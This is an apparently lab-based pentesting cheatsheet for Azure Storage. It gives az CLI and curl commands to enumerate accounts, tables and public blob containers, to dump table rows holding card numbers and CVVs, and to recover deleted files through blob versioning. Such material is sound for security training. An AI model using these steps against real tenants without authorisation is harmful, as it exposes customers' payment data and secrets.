Cheatsheet - Azure - Storage Accounts
Enumerate storage accounts
List all accessible storage accounts:
az storage account list --query "[].name" -o tsv
Example output:
custdatabase
mbtwebsite
securityconfigs
Enumerate storage tables
List accessible tables within a given storage account:
az storage table list --account-name <account|e.g. custdatabase> --output table --auth-mode login
Example output:
Name
---------
customers
List contents of storage table
List the contents of a given storage table:
az storage entity query --table-name <tablename> --account-name <accountname> --output table --auth-mode login
Example output:
PartitionKey RowKey Card_expiry Card_number Customer_id Customer_name Cvv
-------------- -------- ------------- ---------------- ------------------------------------ -------------------------------------- -----
1 1 10/30 5**03 07244ad0-c228-43d8-a48e-1846796aa6ad SecureBank Holdings 543
1 10 01/30 4****101 cba21bec-7e8d-4394-a145-ea7f6131a998 InnoVenture 781
1 2 09/29 40******26 66d7a744-5eb6-4b1b-9e70-a36824366534 NeuraHealth 452
Blob address breakdown
Viewing the source code of our target's website we see the following reference:
<link rel="stylesheet" media="screen" href="[https://mbtwebsite.blob.core.windows.net/$web/static/application-0162b80622a4b825c801f8afcd695b5918649df6f9b26eb012974f9b00a777c5.css](https://mbtwebsite.blob.core.windows.net/$web/static/application-0162b80622a4b825c801f8afcd695b5918649df6f9b26eb012974f9b00a777c5.css)"><link rel="stylesheet" href="[https://mbtwebsite.blob.core.windows.net/$web/static/css](https://mbtwebsite.blob.core.windows.net/$web/static/css)"
We can change the URL to the following and confirm that the web site still loads:
https://mbtwebsite.blob.core.windows.net/$web/index.html
Of particular note from the URL:
mbtwebsite- this is the name of the Azure Storage Account associated with the blob storage.blob.core.windows.net- This is the Azure blob storage service.$web- container hosting the website
Enumerate publicly accessible Blob via web browser
We can enumerate the $web container with the following in the web browser:
https://mbtwebsite.blob.core.windows.net/$web?restype=container&comp=list
Directories within the container can be listed using the delimiter parameter with a value of /:
https://mbtwebsite.blob.core.windows.net/$web?restype=container&comp=list&delimiter=%2f
Abuse versioning in Blob to locate deleted files
Containers can also have versioning enabled. This allows administrators to roll back files to previous versions. We can query the container to determine whether versioning is enabled, and if so, potentially access deleted sensitive files.
To access container versions we must use the command-line via the include=versions parameter. We must also provide the x-ms-version: 2019-12-12 header in our request:
curl -H "x-ms-version: 2019-12-12" 'https://mbtwebsite.blob.core.windows.net/$web?restype=container&comp=list&include=versions' | xmllint --format - | less
Running this we now see an old deleted file:
<Blob>
<Name>scripts-transfer.zip</Name>
<VersionId>2024-03-29T20:55:40.8265593Z</VersionId>
<Properties>
<Creation-Time>Fri, 29 Mar 2024 20:55:40 GMT</Creation-Time>
<Last-Modified>Fri, 29 Mar 2024 20:55:40 GMT</Last-Modified>
<Etag>0x8DC503297FC8D79</Etag>
<Content-Length>1503</Content-Length>
<Content-Type>application/x-zip-compressed</Content-Type>
<Content-Encoding/>
<Content-Language/>
<Content-CRC64/>
<Content-MD5>1qDsI5JcoEf80LrjeE21Yg==</Content-MD5>
<Cache-Control/>
<Content-Disposition/>
<BlobType>BlockBlob</BlobType>
<AccessTier>Hot</AccessTier>
<AccessTierInferred>true</AccessTierInferred>
<ServerEncrypted>true</ServerEncrypted>
</Properties>
<OrMetadata/>
</Blob>
We can then download this file via the command line by specifying the file name as well as the version ID of the file:
curl -H "x-ms-version: 2019-12-12" 'https://mbtwebsite.blob.core.windows.net/$web/scripts-transfer.zip?versionId=2024-03-29T20:55:40.8265593Z' --output scripts-transfer.zip